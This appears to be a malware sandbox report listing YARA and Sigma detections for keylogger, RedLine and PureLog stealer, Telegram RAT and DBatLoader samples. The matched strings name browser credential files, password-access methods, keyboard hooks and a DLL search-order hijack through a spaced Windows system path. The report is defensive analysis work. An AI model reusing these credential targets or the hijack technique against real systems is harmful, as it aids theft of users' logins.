15.3.npratlsN.pif.2b88cb18.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
15.3.npratlsN.pif.2b88cb18.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
15.3.npratlsN.pif.2b88cb18.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
17.2.npratlsN.pif.2b0c0000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.npratlsN.pif.2b0c0000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.npratlsN.pif.2b0c0000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.npratlsN.pif.2b0c0000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.npratlsN.pif.2d63a8ee.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.npratlsN.pif.2d63a8ee.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.npratlsN.pif.2d63a8ee.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.npratlsN.pif.2d63a8ee.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.npratlsN.pif.2d63a8ee.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c8f1:$a1: get_encryptedPassword 0x3c8c5:$a2: get_encryptedUsername 0x3c989:$a3: get_timePasswordChanged 0x3c8a1:$a4: get_passwordField 0x3c907:$a5: set_encryptedPassword 0x3c6d4:$a7: get_logins 0x37d4f:$a10: KeyLoggerEventArgs 0x37d1e:$a11: KeyLoggerEventArgsEventHandler 0x3c7a8:$a13: _encryptedPassword
15.2.npratlsN.pif.2d63a8ee.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47a20:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x470c3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47320:$a4: \Orbitum\User Data\Default\Login Data 0x47cff:$a5: \Kometa\User Data\Default\Login Data
17.2.npratlsN.pif.28129a06.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.npratlsN.pif.28129a06.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.npratlsN.pif.28129a06.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.2.npratlsN.pif.28129a06.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d7d9:$a1: get_encryptedPassword 0x3d7ad:$a2: get_encryptedUsername 0x3d871:$a3: get_timePasswordChanged 0x3d789:$a4: get_passwordField 0x3d7ef:$a5: set_encryptedPassword 0x3d5bc:$a7: get_logins 0x38c37:$a10: KeyLoggerEventArgs 0x38c06:$a11: KeyLoggerEventArgsEventHandler 0x3d690:$a13: _encryptedPassword
7.2.brightness.exe.21800948.9.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0xafb40:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x92b10:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x93190:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0xb181a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0xb1460:$s5: delete[] 0x1de88:$s6: constructor or from DllMain. 0xb0918:$s6: constructor or from DllMain.
15.2.npratlsN.pif.2fd20ee8.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.npratlsN.pif.2fd20ee8.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.npratlsN.pif.2fd20ee8.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.npratlsN.pif.2fd20ee8.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.3.npratlsN.pif.1abebba8.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.3.npratlsN.pif.1abebba8.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.2.npratlsN.pif.2aa40ee8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.npratlsN.pif.2aa40ee8.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.2.npratlsN.pif.2b0c0000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c8f1:$a1: get_encryptedPassword 0x3c8c5:$a2: get_encryptedUsername 0x3c989:$a3: get_timePasswordChanged 0x3c8a1:$a4: get_passwordField 0x3c907:$a5: set_encryptedPassword 0x3c6d4:$a7: get_logins 0x37d4f:$a10: KeyLoggerEventArgs 0x37d1e:$a11: KeyLoggerEventArgsEventHandler 0x3c7a8:$a13: _encryptedPassword
17.2.npratlsN.pif.2b0c0000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47a20:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x470c3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47320:$a4: \Orbitum\User Data\Default\Login Data 0x47cff:$a5: \Kometa\User Data\Default\Login Data
13.2.npratlsN.pif.1efb0000.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.2.npratlsN.pif.1efb0000.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.npratlsN.pif.1efb0000.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.npratlsN.pif.1efb0000.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d7d9:$a1: get_encryptedPassword 0x3d7ad:$a2: get_encryptedUsername 0x3d871:$a3: get_timePasswordChanged 0x3d789:$a4: get_passwordField 0x3d7ef:$a5: set_encryptedPassword 0x3d5bc:$a7: get_logins 0x38c37:$a10: KeyLoggerEventArgs 0x38c06:$a11: KeyLoggerEventArgsEventHandler 0x3d690:$a13: _encryptedPassword
13.2.npratlsN.pif.1efb0000.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48908:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47fab:$a3: \Google\Chrome\User Data\Default\Login Data 0x48208:$a4: \Orbitum\User Data\Default\Login Data 0x48be7:$a5: \Kometa\User Data\Default\Login Data
17.2.npratlsN.pif.2aa40ee8.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47a20:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x470c3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47320:$a4: \Orbitum\User Data\Default\Login Data 0x47cff:$a5: \Kometa\User Data\Default\Login Data
13.2.npratlsN.pif.1c7c9a06.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.npratlsN.pif.1c7c9a06.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
13.2.npratlsN.pif.1c7c9a06.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.2.npratlsN.pif.1c7c9a06.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.npratlsN.pif.1c7c9a06.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.2.npratlsN.pif.28129a06.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48908:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47fab:$a3: \Google\Chrome\User Data\Default\Login Data 0x48208:$a4: \Orbitum\User Data\Default\Login Data 0x48be7:$a5: \Kometa\User Data\Default\Login Data
13.2.npratlsN.pif.1efb0ee8.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.brightness.exe.2780000.2.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
17.2.npratlsN.pif.2812a8ee.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.npratlsN.pif.2812a8ee.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.2.npratlsN.pif.2fd20ee8.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c8f1:$a1: get_encryptedPassword 0x3c8c5:$a2: get_encryptedUsername 0x3c989:$a3: get_timePasswordChanged 0x3c8a1:$a4: get_passwordField 0x3c907:$a5: set_encryptedPassword 0x3c6d4:$a7: get_logins 0x37d4f:$a10: KeyLoggerEventArgs 0x37d1e:$a11: KeyLoggerEventArgsEventHandler 0x3c7a8:$a13: _encryptedPassword
13.3.npratlsN.pif.1abebba8.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.3.npratlsN.pif.1abebba8.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.3.npratlsN.pif.1abebba8.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.3.npratlsN.pif.1abebba8.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
13.3.npratlsN.pif.1abebba8.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
13.3.npratlsN.pif.1abebba8.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
13.2.npratlsN.pif.1c7c9a06.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.npratlsN.pif.1c7c9a06.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.2.npratlsN.pif.1c7c9a06.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.npratlsN.pif.1c7c9a06.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.3.npratlsN.pif.1abebba8.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.npratlsN.pif.1c7ca8ee.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.npratlsN.pif.1c7ca8ee.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.2.npratlsN.pif.1c7ca8ee.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.npratlsN.pif.1c7ca8ee.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.2.npratlsN.pif.28129a06.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b38c:$s1: UnHook 0x3b328:$s2: SetHook 0x3b361:$s3: CallNextHook 0x3b2f0:$s4: _hook
13.2.npratlsN.pif.1efb0ee8.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.2.npratlsN.pif.1efb0ee8.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.npratlsN.pif.1efb0ee8.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.2.npratlsN.pif.2aa40ee8.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.npratlsN.pif.2aa40ee8.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.npratlsN.pif.2aa40ee8.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.2.npratlsN.pif.2aa40ee8.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
13.2.npratlsN.pif.1efb0000.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b38c:$s1: UnHook 0x3b328:$s2: SetHook 0x3b361:$s3: CallNextHook 0x3b2f0:$s4: _hook
15.2.npratlsN.pif.2d63a8ee.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a4a4:$s1: UnHook 0x3a440:$s2: SetHook 0x3a479:$s3: CallNextHook 0x3a408:$s4: _hook
13.2.npratlsN.pif.1c7c9a06.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d7d9:$a1: get_encryptedPassword 0x3d7ad:$a2: get_encryptedUsername 0x3d871:$a3: get_timePasswordChanged 0x3d789:$a4: get_passwordField 0x3d7ef:$a5: set_encryptedPassword 0x3d5bc:$a7: get_logins 0x38c37:$a10: KeyLoggerEventArgs 0x38c06:$a11: KeyLoggerEventArgsEventHandler 0x3d690:$a13: _encryptedPassword
13.3.npratlsN.pif.1abebba8.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.3.npratlsN.pif.1abebba8.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.3.npratlsN.pif.1abebba8.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.npratlsN.pif.1c7ca8ee.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c8f1:$a1: get_encryptedPassword 0x3c8c5:$a2: get_encryptedUsername 0x3c989:$a3: get_timePasswordChanged 0x3c8a1:$a4: get_passwordField 0x3c907:$a5: set_encryptedPassword 0x3c6d4:$a7: get_logins 0x37d4f:$a10: KeyLoggerEventArgs 0x37d1e:$a11: KeyLoggerEventArgsEventHandler 0x3c7a8:$a13: _encryptedPassword
13.3.npratlsN.pif.1abebba8.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c8f1:$a1: get_encryptedPassword 0x3c8c5:$a2: get_encryptedUsername 0x3c989:$a3: get_timePasswordChanged 0x3c8a1:$a4: get_passwordField 0x3c907:$a5: set_encryptedPassword 0x3c6d4:$a7: get_logins 0x37d4f:$a10: KeyLoggerEventArgs 0x37d1e:$a11: KeyLoggerEventArgsEventHandler 0x3c7a8:$a13: _encryptedPassword
13.2.npratlsN.pif.1c7ca8ee.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47a20:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x470c3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47320:$a4: \Orbitum\User Data\Default\Login Data 0x47cff:$a5: \Kometa\User Data\Default\Login Data
13.3.npratlsN.pif.1abebba8.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47a20:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x470c3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47320:$a4: \Orbitum\User Data\Default\Login Data 0x47cff:$a5: \Kometa\User Data\Default\Login Data
17.2.npratlsN.pif.2b0c0000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a4a4:$s1: UnHook 0x3a440:$s2: SetHook 0x3a479:$s3: CallNextHook 0x3a408:$s4: _hook
15.3.npratlsN.pif.2b88cb18.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.npratlsN.pif.2aa40ee8.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a4a4:$s1: UnHook 0x3a440:$s2: SetHook 0x3a479:$s3: CallNextHook 0x3a408:$s4: _hook
17.2.npratlsN.pif.2aa40ee8.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
13.2.npratlsN.pif.1c7c9a06.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48908:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47fab:$a3: \Google\Chrome\User Data\Default\Login Data 0x48208:$a4: \Orbitum\User Data\Default\Login Data 0x48be7:$a5: \Kometa\User Data\Default\Login Data
13.2.npratlsN.pif.1f7f0000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.npratlsN.pif.1f7f0000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.2.npratlsN.pif.1f7f0000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.npratlsN.pif.1f7f0000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.npratlsN.pif.1efb0ee8.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c8f1:$a1: get_encryptedPassword 0x3c8c5:$a2: get_encryptedUsername 0x3c989:$a3: get_timePasswordChanged 0x3c8a1:$a4: get_passwordField 0x3c907:$a5: set_encryptedPassword 0x3c6d4:$a7: get_logins 0x37d4f:$a10: KeyLoggerEventArgs 0x37d1e:$a11: KeyLoggerEventArgsEventHandler 0x3c7a8:$a13: _encryptedPassword
13.2.npratlsN.pif.1c7ca8ee.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a4a4:$s1: UnHook 0x3a440:$s2: SetHook 0x3a479:$s3: CallNextHook 0x3a408:$s4: _hook
13.2.npratlsN.pif.1efb0ee8.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47a20:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x470c3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47320:$a4: \Orbitum\User Data\Default\Login Data 0x47cff:$a5: \Kometa\User Data\Default\Login Data
15.3.npratlsN.pif.2b88cb18.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.3.npratlsN.pif.2b88cb18.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.3.npratlsN.pif.2b88cb18.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.npratlsN.pif.1c7c9a06.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f5d9:$a1: get_encryptedPassword 0x3f5ad:$a2: get_encryptedUsername 0x3f671:$a3: get_timePasswordChanged 0x3f589:$a4: get_passwordField 0x3f5ef:$a5: set_encryptedPassword 0x3f3bc:$a7: get_logins 0x3aa37:$a10: KeyLoggerEventArgs 0x3aa06:$a11: KeyLoggerEventArgsEventHandler 0x3f490:$a13: _encryptedPassword
17.2.npratlsN.pif.2812a8ee.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.npratlsN.pif.2812a8ee.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.npratlsN.pif.2812a8ee.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.2.npratlsN.pif.2812a8ee.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
13.3.npratlsN.pif.1abebba8.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a4a4:$s1: UnHook 0x3a440:$s2: SetHook 0x3a479:$s3: CallNextHook 0x3a408:$s4: _hook
13.2.npratlsN.pif.1efb0ee8.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a4a4:$s1: UnHook 0x3a440:$s2: SetHook 0x3a479:$s3: CallNextHook 0x3a408:$s4: _hook
17.2.npratlsN.pif.2aa40ee8.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
13.2.npratlsN.pif.1c7c9a06.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b38c:$s1: UnHook 0x3b328:$s2: SetHook 0x3b361:$s3: CallNextHook 0x3b2f0:$s4: _hook
13.2.npratlsN.pif.1c7c9a06.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a708:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49dab:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a008:$a4: \Orbitum\User Data\Default\Login Data 0x4a9e7:$a5: \Kometa\User Data\Default\Login Data
13.2.npratlsN.pif.1c7c9a06.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d18c:$s1: UnHook 0x3d128:$s2: SetHook 0x3d161:$s3: CallNextHook 0x3d0f0:$s4: _hook
15.3.npratlsN.pif.2b88cb18.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c8f1:$a1: get_encryptedPassword 0x3c8c5:$a2: get_encryptedUsername 0x3c989:$a3: get_timePasswordChanged 0x3c8a1:$a4: get_passwordField 0x3c907:$a5: set_encryptedPassword 0x3c6d4:$a7: get_logins 0x37d4f:$a10: KeyLoggerEventArgs 0x37d1e:$a11: KeyLoggerEventArgsEventHandler 0x3c7a8:$a13: _encryptedPassword
15.2.npratlsN.pif.2fd20ee8.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47a20:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x470c3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47320:$a4: \Orbitum\User Data\Default\Login Data 0x47cff:$a5: \Kometa\User Data\Default\Login Data
13.2.npratlsN.pif.1f7f0000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3c8f1:$a1: get_encryptedPassword 0x3c8c5:$a2: get_encryptedUsername 0x3c989:$a3: get_timePasswordChanged 0x3c8a1:$a4: get_passwordField 0x3c907:$a5: set_encryptedPassword 0x3c6d4:$a7: get_logins 0x37d4f:$a10: KeyLoggerEventArgs 0x37d1e:$a11: KeyLoggerEventArgsEventHandler 0x3c7a8:$a13: _encryptedPassword
17.2.npratlsN.pif.2812a8ee.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
17.2.npratlsN.pif.2812a8ee.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
13.2.npratlsN.pif.1f7f0000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47a20:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x470c3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47320:$a4: \Orbitum\User Data\Default\Login Data 0x47cff:$a5: \Kometa\User Data\Default\Login Data
15.3.npratlsN.pif.2b88cb18.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47a20:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x470c3:$a3: \Google\Chrome\User Data\Default\Login Data 0x47320:$a4: \Orbitum\User Data\Default\Login Data 0x47cff:$a5: \Kometa\User Data\Default\Login Data
15.2.npratlsN.pif.2fd20ee8.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a4a4:$s1: UnHook 0x3a440:$s2: SetHook 0x3a479:$s3: CallNextHook 0x3a408:$s4: _hook
13.2.npratlsN.pif.1f7f0000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a4a4:$s1: UnHook 0x3a440:$s2: SetHook 0x3a479:$s3: CallNextHook 0x3a408:$s4: _hook
15.3.npratlsN.pif.2b88cb18.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a4a4:$s1: UnHook 0x3a440:$s2: SetHook 0x3a479:$s3: CallNextHook 0x3a408:$s4: _hook
Click to see the 267 entries

Sigma Signatures

System Summary

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Source: File created

Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 7368, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Sigma detected: Execution from Suspicious Folder

Source: Process started

